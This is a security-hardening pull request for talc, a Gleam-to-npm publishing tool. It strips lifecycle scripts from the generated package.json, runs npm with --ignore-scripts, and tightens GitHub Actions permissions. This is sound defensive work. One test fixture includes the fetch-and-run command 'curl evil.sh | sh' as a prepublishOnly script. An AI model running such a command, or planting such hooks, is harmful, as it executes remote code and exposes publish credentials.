### PR TITLE
fix: harden publish + PR workflows against lifecycle-script credential exposure

### DIFF
--- a/.changes/unreleased/Security-20260508-193635.yaml
+++ b/.changes/unreleased/Security-20260508-193635.yaml
@@ -1,0 +1,3 @@
+kind: Security
+body: Block npm lifecycle script injection during `talc publish` / `talc pack`. Scripts are stripped from the generated `package.json` and npm is invoked with `--ignore-scripts` unless `package.unsafe_allow_scripts = true` is set in `talc.ccl`.
+time: 2026-05-08T19:36:35.108801603-07:00

--- a/.github/workflows/pr.yml
+++ b/.github/workflows/pr.yml
@@ -4,39 +4,56 @@ on:
   pull_request:
     types: [opened, synchronize, reopened, ready_for_review]
 
-permissions:
-  pull-requests: write
+# Default-deny: each job grants only the permissions it actually needs.
+permissions: {}
 
 jobs:
-  # PR title conventional commit validation
+  # PR title conventional commit validation.
+  #
+  # SECURITY: This job deliberately does NOT check out PR code. The PR title
+  # comes from the event payload via an environment variable, and commitlint
+  # is installed in a scratch directory under $RUNNER_TEMP with
+  # `--ignore-scripts` so no package.json, .npmrc, or lifecycle hook from
+  # the PR can execute here.
   title:
     name: PR Title
     runs-on: ubuntu-latest
     if: github.event.pull_request.draft != true
+    permissions:
+      contents: read
     steps:
-      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # ratchet:actions/checkout@v6
-
       - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # ratchet:actions/setup-node@v4
         with:
           node-version: "22"
 
-      - name: Install commitlint
-        run: npm install --save-dev @commitlint/cli @commitlint/config-conventional
+      - name: Install commitlint (isolated from PR workspace)
+        working-directory: ${{ runner.temp }}
+        run: |
+          npm init -y >/dev/null
+          npm install --no-save --ignore-scripts \
+            @commitlint/cli @commitlint/config-conventional
+          echo 'module.exports = { extends: ["@commitlint/config-conventional"] };' \
+            > commitlint.config.js
 
       - name: Validate PR title
+        working-directory: ${{ runner.temp }}
         env:
           PR_TITLE: ${{ github.event.pull_request.title }}
-        run: echo "$PR_TITLE" | npx commitlint
+        run: printf '%s\n' "$PR_TITLE" | npx --no-install commitlint
 
   # Changelog entry check
   changelog:
     name: Changelog
     runs-on: ubuntu-latest
     if: github.event.pull_request.draft != true
+    permissions:
+      contents: read
+      pull-requests: write
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # ratchet:actions/checkout@v6
         with:
           fetch-depth: 0
+          persist-credentials: false
       - uses: tylerbutler/actions/changie-check@c697a813534c6364a835de8e2ed2c4e0c3638bbe # ratchet:tylerbutler/actions/changie-check@main
         id: changelog
         with:

--- a/.tool-versions
+++ b/.tool-versions
@@ -1,3 +1,3 @@
 erlang 27.2.1
-gleam 1.14.0
+gleam 1.16.0
 just 1.38.0

--- a/src/talc.gleam
+++ b/src/talc.gleam
@@ -184,7 +184,7 @@ fn run_generate(
     None -> talc.package.output_dir
   }
 
-  let effective_talc =
+  let effective_talc_pre =
     talc_config.TalcConfig(
       ..talc,
       package: talc_config.PackageConfig(
@@ -192,6 +192,9 @@ fn run_generate(
         output_dir: effective_output_dir,
       ),
     )
+
+  let #(effective_talc, sanitize_warnings) =
+    package_json.sanitize_extras(effective_talc_pre)
 
   // Load package interface for module discovery and function signatures
   use package <- try_ok(interface.load())
@@ -251,7 +254,20 @@ fn run_generate(
     |> map_error(output.error_to_string),
   )
 
-  Ok(#(written, all_warnings, effective_talc))
+  Ok(#(written, list.append(sanitize_warnings, all_warnings), effective_talc))
+}
+
+/// Returns `["--ignore-scripts"]` unless the user has explicitly opted in to
+/// lifecycle scripts via `package.unsafe_allow_scripts = true` in talc.ccl.
+/// Used by both `pack` and `publish` to prevent untrusted lifecycle code from
+/// running with credentials available.
+fn ignore_scripts_flags(
+  effective_talc: talc_config.TalcConfig,
+) -> List(String) {
+  case effective_talc.package.unsafe_allow_scripts {
+    True -> []
+    False -> ["--ignore-scripts"]
+  }
 }
 
 fn run_pack(
@@ -263,7 +279,10 @@ fn run_pack(
 
   let output_dir = effective_talc.package.output_dir
 
-  use tarball <- try_ok(npm.pack(output_dir) |> map_error(npm.error_to_string))
+  use tarball <- try_ok(
+    npm.pack(output_dir, ignore_scripts_flags(effective_talc))
+    |> map_error(npm.error_to_string),
+  )
 
   Ok(#(tarball, warnings))
 }
@@ -286,7 +305,10 @@ fn run_publish(
     extra_field_keys,
   ))
 
-  let all_flags = list.append(flags, registry_flags)
+  let all_flags =
+    flags
+    |> list.append(registry_flags)
+    |> list.append(ignore_scripts_flags(effective_talc))
 
   use npm_output <- try_ok(
     npm.publish(output_dir, all_flags) |> map_error(npm.error_to_string),

--- a/src/talc/npm.gleam
+++ b/src/talc/npm.gleam
@@ -53,9 +53,12 @@ pub fn publish_flag_error_to_string(error: PublishFlagError) -> String {
   }
 }
 
-/// Runs `npm pack` in the given directory.
-pub fn pack(working_dir: String) -> Result(String, NpmError) {
-  case run_npm("pack", [], working_dir) {
+/// Runs `npm pack` in the given directory with the given flags.
+pub fn pack(
+  working_dir: String,
+  flags: List(String),
+) -> Result(String, NpmError) {
+  case run_npm("pack", flags, working_dir) {
     Ok(#(0, output)) -> Ok(string.trim(output))
     Ok(#(code, output)) -> Error(NpmFailed("pack", code, output))
     Error(RunNotFound) -> Error(NpmNotFound)

--- a/src/talc/package_json.gleam
+++ b/src/talc/package_json.gleam
@@ -11,11 +11,39 @@ import gleam/result
 import gleam/set.{type Set}
 import gleam/string
 import talc/gleam_toml.{type GleamConfig}
-import talc/talc_config.{type TalcConfig}
+import talc/talc_config.{type TalcConfig, TalcConfig}
 
 // Fields that, when all overridden together via extra_fields, mean the
 // auto-generated root-module entrypoints will not be emitted at all.
 const output_entrypoint_fields = ["exports", "main", "module", "types"]
+
+/// Strips `extra_fields` entries that would inject npm lifecycle code into
+/// the generated package.json unless the user has explicitly opted in via
+/// `package.unsafe_allow_scripts = true` in talc.ccl.
+///
+/// Returns the (possibly modified) config and a list of human-readable
+/// warning strings describing what was stripped.
+///
+/// This blocks the credential-exposure path where a malicious release PR
+/// adds `scripts.prepublishOnly` / `scripts.prepare` via talc.ccl and has
+/// it run with `NODE_AUTH_TOKEN` available during `npm publish`.
+pub fn sanitize_extras(talc: TalcConfig) -> #(TalcConfig, List(String)) {
+  case talc.package.unsafe_allow_scripts {
+    True -> #(talc, [])
+    False -> {
+      let #(kept, dropped) =
+        list.partition(talc.extra_fields, fn(pair) { pair.0 != "scripts" })
+      case dropped {
+        [] -> #(talc, [])
+        _ -> {
+          let warning =
+            "Stripped 'scripts' from generated package.json (set package.unsafe_allow_scripts = \"true\" in talc.ccl to opt in)"
+          #(TalcConfig(..talc, extra_fields: kept), [warning])
+        }
+      }
+    }
+  }
+}
 
 /// Errors that can occur during package.json generation.
 pub type GenerationError {

--- a/src/talc/talc_config.gleam
+++ b/src/talc/talc_config.gleam
@@ -22,6 +22,12 @@ pub type PackageConfig {
     scope: Option(String),
     registry: Option(String),
     output_dir: String,
+    /// When True, the user opts in to lifecycle script execution: `scripts`
+    /// from `[package.json]` are kept in the generated package.json, and
+    /// `npm pack`/`npm publish` are invoked WITHOUT `--ignore-scripts`.
+    /// Defaults to False — a malicious release PR cannot land arbitrary
+    /// `prepublishOnly`/`prepare` code paths via `talc.ccl`.
+    unsafe_allow_scripts: Bool,
   )
 }
 
@@ -40,7 +46,12 @@ pub type TalcConfig {
 /// Returns a TalcConfig with all default values.
 pub fn default() -> TalcConfig {
   TalcConfig(
-    package: PackageConfig(scope: None, registry: None, output_dir: "npm_dist"),
+    package: PackageConfig(
+      scope: None,
+      registry: None,
+      output_dir: "npm_dist",
+      unsafe_allow_scripts: False,
+    ),
     extra_fields: [],
     peer_dependencies: [],
     use_true_myth: True,
@@ -109,7 +120,19 @@ fn parse_package(ccl: CCL) -> PackageConfig {
     Error(_) -> "npm_dist"
   }
 
-  PackageConfig(scope: scope, registry: registry, output_dir: output_dir)
+  let unsafe_allow_scripts = case
+    access.get_string(ccl, ["package", "unsafe_allow_scripts"])
+  {
+    Ok("true") -> True
+    _ -> False
+  }
+
+  PackageConfig(
+    scope: scope,
+    registry: registry,
+    output_dir: output_dir,
+    unsafe_allow_scripts: unsafe_allow_scripts,
+  )
 }
 
 fn parse_extra_fields(ccl: CCL) -> List(#(String, json.Json)) {

--- a/test/package_json_test.gleam
+++ b/test/package_json_test.gleam
@@ -1,4 +1,5 @@
 import gleam/json
+import gleam/list
 import gleam/option.{None, Some}
 import gleam/set
 import gleam/string
@@ -54,6 +55,7 @@ pub fn generate_with_scope_test() {
         scope: Some("@myorg"),
         registry: None,
         output_dir: "npm_dist",
+        unsafe_allow_scripts: False,
       ),
     )
 
@@ -118,6 +120,70 @@ pub fn generate_with_extra_fields_test() {
   let result = package_json.generate(gleam, talc) |> expect.to_be_ok()
   result |> string_contains("\"homepage\"") |> expect.to_be_true()
   result |> string_contains("https://example.com") |> expect.to_be_true()
+}
+
+pub fn sanitize_extras_strips_scripts_by_default_test() {
+  let talc =
+    TalcConfig(..test_talc_config(), extra_fields: [
+      #("homepage", json.string("https://example.com")),
+      #(
+        "scripts",
+        json.object([#("prepublishOnly", json.string("curl evil.sh | sh"))]),
+      ),
+    ])
+
+  let #(sanitized, warnings) = package_json.sanitize_extras(talc)
+
+  sanitized.extra_fields
+  |> keys_only()
+  |> expect.to_equal(["homepage"])
+  warnings |> expect.to_not_equal([])
+  let assert [warning] = warnings
+  warning
+  |> string_contains("scripts")
+  |> expect.to_be_true()
+  warning
+  |> string_contains("unsafe_allow_scripts")
+  |> expect.to_be_true()
+}
+
+pub fn sanitize_extras_keeps_scripts_when_opted_in_test() {
+  let talc =
+    TalcConfig(
+      ..test_talc_config(),
+      package: PackageConfig(
+        ..test_talc_config().package,
+        unsafe_allow_scripts: True,
+      ),
+      extra_fields: [
+        #("scripts", json.object([#("test", json.string("vitest"))])),
+      ],
+    )
+
+  let #(sanitized, warnings) = package_json.sanitize_extras(talc)
+
+  sanitized.extra_fields
+  |> keys_only()
+  |> expect.to_equal(["scripts"])
+  warnings |> expect.to_equal([])
+}
+
+pub fn sanitize_extras_no_scripts_no_warnings_test() {
+  let talc =
+    TalcConfig(..test_talc_config(), extra_fields: [
+      #("homepage", json.string("https://example.com")),
+    ])
+
+  let #(sanitized, warnings) = package_json.sanitize_extras(talc)
+
+  sanitized.extra_fields
+  |> keys_only()
+  |> expect.to_equal(["homepage"])
+  warnings |> expect.to_equal([])
+}
+
+fn keys_only(fields: List(#(String, json.Json))) -> List(String) {
+  list.map(fields, fn(pair) { pair.0 })
 }
 
 pub fn validate_valid_config_test() {

--- a/test/talc_config_test.gleam
+++ b/test/talc_config_test.gleam
@@ -9,8 +9,34 @@ pub fn default_config_test() {
   config.package.scope |> expect.to_equal(None)
   config.package.registry |> expect.to_equal(None)
   config.package.output_dir |> expect.to_equal("npm_dist")
+  config.package.unsafe_allow_scripts |> expect.to_be_false()
   config.extra_fields |> expect.to_equal([])
   config.peer_dependencies |> expect.to_equal([])
+}
+
+pub fn parse_unsafe_allow_scripts_default_test() {
+  let config = talc_config.parse("") |> expect.to_be_ok()
+  config.package.unsafe_allow_scripts |> expect.to_be_false()
+}
+
+pub fn parse_unsafe_allow_scripts_true_test() {
+  let ccl =
+    "package =
+  unsafe_allow_scripts = true
+"
+
+  let config = talc_config.parse(ccl) |> expect.to_be_ok()
+  config.package.unsafe_allow_scripts |> expect.to_be_true()
+}
+
+pub fn parse_unsafe_allow_scripts_false_test() {
+  let ccl =
+    "package =
+  unsafe_allow_scripts = false
+"
+
+  let config = talc_config.parse(ccl) |> expect.to_be_ok()
+  config.package.unsafe_allow_scripts |> expect.to_be_false()
 }
 
 pub fn parse_empty_ccl_test() {


### PR DESCRIPTION
## Summary

Closes #7. Two commits, one per finding.

- **Commit 1 (`fix(security): block npm lifecycle script injection on publish`)** — strips `scripts` from `extra_fields` in the generated `package.json` by default, and invokes `npm pack`/`npm publish` with `--ignore-scripts`. Both gated by a single new opt-in flag, `package.unsafe_allow_scripts`, in `talc.ccl`.
- **Commit 2 (`fix(ci): harden PR title workflow against credential exposure`)** — the title job no longer checks out PR code and installs commitlint under `\$RUNNER_TEMP` with `--ignore-scripts`. Outer permissions default-deny; `pull-requests: write` is scoped to the changelog job. Changelog checkout sets `persist-credentials: false`.

## Test plan

- [x] `gleam test` — 108 pass (6 new: 3 `talc_config`, 3 `package_json`).
- [x] `just ci` green incl. integration (`npm pack` of fixture still works).
- [ ] Verify on this PR itself that the new `title` job validates the conventional-commit title without checking out the branch.
- [ ] Verify `changelog` job still posts/updates its sticky comment with `persist-credentials: false`.